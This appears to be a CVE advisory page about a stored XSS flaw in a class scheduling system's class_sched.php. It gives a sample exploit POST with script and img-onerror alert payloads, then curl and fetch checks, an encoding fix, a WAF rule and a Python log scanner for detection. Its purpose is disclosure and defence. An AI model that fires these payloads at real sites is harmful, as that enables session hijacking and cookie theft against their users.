How CVE-2025-29568 Works
The vulnerability exists in the `class_sched.php` component of Code-Projects Online Class and Exam Scheduling System 1.0. The application fails to properly sanitize user-supplied input in the `class` parameter, allowing attackers to inject malicious JavaScript payloads. When an administrator or other privileged user views the compromised class schedule, the script executes in their browser session, potentially leading to session hijacking, data theft, or unauthorized actions. The attack requires no authentication and can be delivered via crafted links or stored in the system.
DailyCVE Form
Platform: Code-Projects Scheduling System
Version: 1.0
Vulnerability: Stored XSS
Severity: Medium
Date: 05/14/2025
What Undercode Says:
Exploitation:
POST /Scheduling/pages/class_sched.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

class=<script>alert(document.cookie)</script>
Detection:
# Confirms only that the parameter is echoed back in the response; it does not show whether the echoed value is HTML-encoded.
curl -s "http://target.com/Scheduling/pages/class_sched.php?class=TEST" | grep -q "TEST" && echo "Vulnerable"
Mitigation:
// Fix for class_sched.php: HTML-encode the class name so angle brackets and quotes cannot break out of the page markup.
$class = htmlspecialchars($_POST['class'], ENT_QUOTES, 'UTF-8');
// Apply the same encoding at every place a stored class name is echoed into HTML, not only on this form.
WAF Rule:
location ~ /Scheduling/pages/ {
    # $args is the query string only; the POST body used in the exploit above is not inspected,
    # so this rule is defense in depth, not a replacement for the code fix.
    set $block_xss 0;
    # ~* makes the match case-insensitive (<SCRIPT>, <Script>, ...)
    if ($args ~* "<script") {
        set $block_xss 1;
    }
    if ($block_xss = 1) {
        return 403;
    }
}
Log Analysis:
# Match a class= parameter whose value contains raw or percent-encoded angle brackets (%3C / %3E);
# the original pattern only matched a bracket in the second character of the value.
grep -E "class=[^& ]*(<|>|%3[CcEe])" /var/log/apache2/access.log
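The grep above runs over the raw log bytes, so it only sees what is in the request line, and Apache's access log never records a POST body, which is how the exploit above delivers the payload. The following Python script is an added example, not code from DailyCVE or from the Code-Projects project: it parses constructed Apache combined-format lines, percent-decodes the `class` parameter (including double encoding) and flags values that contain HTML metacharacters, and separately counts POST requests to `class_sched.php`, whose bodies have to be reviewed in the application or its database instead. The endpoint path comes from the page; the sample log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint named in the advisory.
ENDPOINT = "/Scheduling/pages/class_sched.php"

# Constructed sample lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [14/May/2025:10:01:02 +0000] "GET /Scheduling/pages/class_sched.php?class=CS101 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [14/May/2025:10:02:10 +0000] "GET /Scheduling/pages/class_sched.php?class=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
203.0.113.9 - - [14/May/2025:10:03:44 +0000] "GET /Scheduling/pages/class_sched.php?class=<img%20src=x%20onerror=alert(1)> HTTP/1.1" 200 5310 "-" "Mozilla/5.0"
203.0.113.11 - - [14/May/2025:10:04:00 +0000] "POST /Scheduling/pages/class_sched.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.13 - - [14/May/2025:10:05:00 +0000] "GET /Scheduling/pages/class_sched.php?class=Math%20%26%20Physics HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

# Client IP, then the quoted request line: METHOD TARGET HTTP/x.y
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Characters that can open or close a tag once echoed unencoded into HTML.
META_RE = re.compile(r"[<>]")


def fully_decode(value, rounds=3):
    """Percent-decode until the string stops changing, so %253C (double-encoded <) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(log_text):
    """Return (hits, unlogged_posts).

    hits: list of (client_ip, decoded_class_value) for GET requests whose
          class parameter contains HTML metacharacters.
    unlogged_posts: number of POSTs to the endpoint; their bodies are not in
          the access log and must be checked in the application data.
    """
    hits = []
    unlogged_posts = 0
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != ENDPOINT:
            continue
        if m["method"] == "POST":
            unlogged_posts += 1
            continue
        # parse_qs decodes one layer of percent-encoding; fully_decode handles the rest.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("class", []):
            value = fully_decode(raw)
            if META_RE.search(value):
                hits.append((m["ip"], value))
    return hits, unlogged_posts


if __name__ == "__main__":
    found, posts = scan_access_log(SAMPLE_LOG)
    for ip, value in found:
        print(f"suspicious class value from {ip}: {value!r}")
    print(f"{posts} POST request(s) to {ENDPOINT}: body not logged, review stored schedules")
```

Legitimate names containing `&` (decoded from `%26`) are not flagged, because the check is on tag delimiters rather than on any special character; extend `META_RE` if the application also echoes the value inside an attribute, where quotes matter as well.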
Patch Verification:
// Run from the browser console on the application's origin; a patched page returns &lt;img instead of <img.
fetch('/Scheduling/pages/class_sched.php?class=<img%20src=x%20onerror=alert(1)>')
  .then(response => response.text())
  .then(data => console.log(data.includes('<img') ? 'Unpatched' : 'Patched'));
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode